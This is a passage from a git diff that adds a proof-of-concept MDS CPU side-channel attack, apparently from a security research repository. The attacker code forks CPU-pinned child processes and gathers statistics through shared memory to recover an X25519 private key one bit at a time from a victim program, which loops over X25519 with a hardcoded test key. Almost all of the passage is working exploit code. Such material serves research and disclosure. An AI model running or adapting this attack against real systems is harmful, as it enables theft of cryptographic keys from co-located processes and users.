privkey, pubkey, x_it); + poss[0][which_qword] = ((size_t*)out)[which_qword]; + + set_bit(privkey, iteration, 0); + set_bit(privkey, iteration-1, 1); + X25519_fake(out, privkey, pubkey, x_it); + poss[1][which_qword] = ((size_t*)out)[which_qword]; + + set_bit(privkey, iteration, 1); + set_bit(privkey, iteration-1, 0); + X25519_fake(out, privkey, pubkey, x_it); + poss[2][which_qword] = ((size_t*)out)[which_qword]; + + set_bit(privkey, iteration, 1); + set_bit(privkey, iteration-1, 1); + X25519_fake(out, privkey, pubkey, x_it); + poss[3][which_qword] = ((size_t*)out)[which_qword]; + } + + printf("iter=%d\nTargets:\n", iteration); + for (int i = 0; i < 5; i++) { + for (int j = 0; j < 4; j++) { + printf("%016llx ", poss[j][i]); + } + printf("\n"); + } + int diff_abs = 0; + int bit; + int num_children = 0; + int pids[1024]; + int affin[1024]; + void* shmem; + shmem = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); + if (shmem == MAP_FAILED) { + err(1, "shared memory alloc failed"); + } + + do { + if (num_children == 0) { + num_children = fork_children(pids, affin, shmem); + memset(shmem, 0, sizeof(results)); + usleep(100 * 1000); + } + memset(shmem, 0, sizeof(results)); + usleep(100 * 1000); + unsigned short results_temp[4][5] = {0}; + memcpy(results_temp, shmem, sizeof(results_temp)); + memset(shmem, 0, sizeof(results)); + int all_good = 1; + for (int i = 0; i < num_children; i++) { + all_good &= affinity_valid(pids[i], affin[i]); + } + if (all_good) { + for (int wq = 0; wq < 5; wq++) { + for (int ij = 0; ij < 4; ij++) { + results[ij][wq] += results_temp[ij][wq]; + } + } + + int sums[4] = {0}; + for (int wq = 0; wq < 5; wq++) { + for (int ij = 0; ij < 4; ij++) { + sums[ij] += results[ij][wq]; + } + printf("%d %d | %d %d\n", results[0][wq], results[1][wq], results[2][wq], results[3][wq]); + } + + int x0 = sums[0] + sums[1]; + int x1 = sums[2] + sums[3]; + diff_abs = x0 - x1; + if (diff_abs < 0) diff_abs = -diff_abs; + bit = x1 > x0; + printf("--- diff_abs %d (%d vs. %d, total %d)\n", diff_abs, x0, x1, x0+x1); + } + else { + printf("Killing children - affinity changed.\n"); + for (int i = 0; i < num_children; i++) { + do_kill(pids[i]); + } + num_children = 0; + } + } while (diff_abs < MARGIN); + printf("Killing children as we leaked the bit.\n"); + for (int i = 0; i < num_children; i++) { + do_kill(pids[i]); + } + set_bit(privkey, iteration-1, 0); + set_bit(privkey, iteration, bit); + print_secret(privkey); +} + +void stage3(size_t secret_offset, size_t saved_rbp) { + uint8_t pubkey[32]; + uint8_t client_privkey[32]; + printf("Input client private key:\n"); + for (int i = 0; i < 32; i++) { + unsigned int n; + scanf("%x", &n); + client_privkey[i] = n; + } + X25519_public_from_private(pubkey, client_privkey); + uint8_t privkey[32] = {0}; + privkey[31] &= 127; + privkey[31] |= 64; + // The algorithm starts at that iteration. + int start_iteration = 253; + + // Check if checkpoint available. + FILE* f = fopen("/tmp/checkpoint", "r"); + if (!f) { + printf("Starting from scratch.\n"); + } + else { + printf("Starting from checkpoint.\n"); + fscanf(f, "%d", &start_iteration); + for (int i = 0; i < 32; i++) { + unsigned int n; + fscanf(f, "%x", &n); + privkey[i] = n; + } + fclose(f); + } + + print_secret(privkey); + + // Ending on iteration 3, since bits 2, 1 and 0 are unset. + for (int iteration = start_iteration; iteration >= 3; iteration--) { + do_iteration(iteration, privkey, pubkey); + } + privkey[0] &= 248; + print_secret(privkey); +} + +void run() { + stage3(0, 0); +} + +int main() { + run(); + + return 0; +} + diff --git a/pocs/cpus/mds-x25519/x25519_victim.c b/pocs/cpus/mds-x25519/x25519_victim.c new file mode 100644 index 00000000..30de7045 --- /dev/null +++ b/pocs/cpus/mds-x25519/x25519_victim.c @@ -0,0 +1,24 @@ +#include +#include + +int X25519(uint8_t out_shared_key[32], + const uint8_t private_key[32], + const uint8_t peer_public_value[32]); +void X25519_public_from_private(uint8_t out_public_value[32], + const uint8_t private_key[32]); + +int main() { + const uint8_t* priv = (const uint8_t*)"privtest12345678somemorebitsABCD"; + uint8_t clientpriv[32] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, + 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32}; + uint8_t pub[32]; + X25519_public_from_private(pub, clientpriv); + for (int i = 0; i < 32; i++) { + printf("%02x ", pub[i]); + } + printf("\n"); + uint8_t out[32]; + while (1) { + X25519(out, priv, pub); + } +}